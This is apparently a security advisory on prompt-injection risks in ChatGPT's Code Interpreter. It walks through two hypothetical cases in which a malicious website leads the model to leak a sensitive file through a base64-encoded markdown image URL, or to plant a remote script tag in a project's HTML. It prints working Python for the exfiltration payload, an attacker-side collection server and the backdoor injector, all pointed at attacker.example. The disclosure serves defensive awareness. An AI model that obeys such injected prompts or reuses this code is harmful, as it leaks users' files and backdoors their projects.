GPTs and Assistants API: Data Exfiltration and Backdoor Risks in Code Interpreter

“You can build a GPT—a customized version of ChatGPT—for almost anything,” Sam Altman, OpenAI’s CEO, said at OpenAI DevDay in San Francisco.

The update released by OpenAI introduces significant innovations and conveniences through customized ChatGPT versions (GPTs) and the Assistants API.

Let's take a closer look at the details of these innovations and their potential impacts:

- One of the most important features is the ability to create your own GPT without needing any coding skills.
- The previously separate Python sandbox and browsing features now work interactively together.

Considering all these aspects, these features are likely to see widespread adoption because of the convenience they provide. By the same token, any security issues that arise could affect very large user populations.

The Code Interpreter in OpenAI's ChatGPT is an innovative feature that elevates the AI model's interactivity. It is specifically designed to execute Python code within a controlled environment and deliver immediate output, making it a potent resource for various purposes, including mathematical calculations, data analysis, code experimentation, and interactive Python programming education.

Some security issues I have observed around this feature are:

- Exfiltration of sensitive files from within the Code Interpreter.
- Inserting a backdoor into the Code Interpreter.

To strengthen the narrative, I created a hypothetical scenario using TinyAI to illustrate the two main security risks. Imagine a developer named Alex who uses OpenAI's new features to automate some of their daily tasks. Alex often uses the Code Interpreter, which allows them to execute Python code directly within the chat interface.

Scenario-1: A Developer Using OpenAI's Code Interpreter

Situation: Alex is testing the Code Interpreter's ability to fetch data from the web, navigating to different websites and scraping their content. While testing, Alex unknowingly navigates to a website that has been compromised to exploit the Code Interpreter.

Exfiltration Process: The malicious website contains an injected prompt designed to search for sensitive files in the environment where Alex's Code Interpreter is running. The prompt locates a file with sensitive information and uses base64 encoding to convert the file's contents into a string. That string is then embedded into a markdown image tag, or any other markdown element that triggers a web request. When the markdown content is rendered, the request for the "image" sends the base64-encoded string to the attacker's server, disguised as an ordinary fetch of an image or other resource.
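As a rough illustration of this primitive, the following Python sketch shows how file contents could be base64-encoded and smuggled into a markdown image URL. The file path, attacker domain, and query parameter are hypothetical placeholders, not values taken from a real incident.

```python
import base64
from pathlib import Path

# Hypothetical sensitive file inside the sandbox (placeholder path).
SENSITIVE_FILE = Path("/mnt/data/credentials.txt")

# Hypothetical attacker-controlled endpoint (placeholder domain).
ATTACKER_ENDPOINT = "https://attacker.example/collect"

def build_exfil_markdown() -> str:
    """Encode the file's contents and hide them in a markdown image URL."""
    raw = SENSITIVE_FILE.read_bytes()
    payload = base64.urlsafe_b64encode(raw).decode()
    # Rendering this markdown triggers a GET request that carries the
    # base64 payload to the attacker's server as a query parameter.
    return f"![status]({ATTACKER_ENDPOINT}?data={payload})"

print(build_exfil_markdown())
```

Once such markdown is rendered, the data leaves the environment without any explicit upload step; the exfiltration hides inside what looks like a routine resource request.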

Figure-1: Navigating to a malicious website and exfiltrating data using markdown.


Figure-2: Obtaining the sensitive data via a GET request.
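On the receiving side, the attacker only needs something that logs incoming GET requests, as in Figure-2. A minimal sketch using Python's standard library could look like the following; the port and the `data` parameter name are assumptions matching the placeholder payload above.

```python
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class CollectHandler(BaseHTTPRequestHandler):
    """Logs and decodes the base64 payload smuggled in the image request."""

    def do_GET(self):
        query = parse_qs(urlparse(self.path).query)
        payload = query.get("data", [""])[0]
        if payload:
            print(base64.urlsafe_b64decode(payload).decode(errors="replace"))
        # Reply with an empty 200 so the request looks like a normal image fetch.
        self.send_response(200)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), CollectHandler).serve_forever()
```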

Scenario-2: Code Interpreter Backdoor

Situation: Alex is working on a web development project and uses the Code Interpreter to check their HTML and JavaScript code snippets. They visit another website to get some inspiration for their project.

Backdoor Creation: The website Alex visits is malicious and contains a prompt crafted to exploit the Code Interpreter. When Alex's Code Interpreter processes the snippet from the website, the injected instructions cause it to write a malicious JavaScript backdoor into Alex's project files.

This backdoor could manifest as a simple script that sends data to the attacker's server or allows the attacker to execute commands on the server hosting Alex's project.
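To make this concrete, here is a hypothetical Python sketch of the kind of modification the Code Interpreter could be tricked into performing on a project file. The file name, attacker domain, and script URL are illustrative placeholders only, not part of an observed attack.

```python
from pathlib import Path

# Hypothetical project file and attacker-hosted script (placeholders).
PROJECT_FILE = Path("index.html")
BACKDOOR_TAG = '<script src="https://attacker.example/backdoor.js"></script>'

def inject_backdoor(html_path: Path) -> None:
    """Slip a remote script tag into the page just before </body>."""
    html = html_path.read_text()
    if BACKDOOR_TAG in html:
        return  # already injected
    patched = html.replace("</body>", f"  {BACKDOOR_TAG}\n</body>", 1)
    html_path.write_text(patched)

inject_backdoor(PROJECT_FILE)
```

A one-line change like this is easy to miss in a diff, which is what makes an injected backdoor of this kind dangerous.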

Outcome: The attacker now has a way to remotely control or access Alex's project server, potentially leading to data theft, further injection of malware, or even a full-blown attack on the server's infrastructure.

Figure-3: Adding malicious content to an existing HTML file.


Reference(s)

https://github.com/VolkanSah/The-Code-Interpreter-in-OpenAI-ChatGPT

Timeline

2023-11-12 - v1.0

2023-11-12 - v1.1

2023-11-13 - v1.2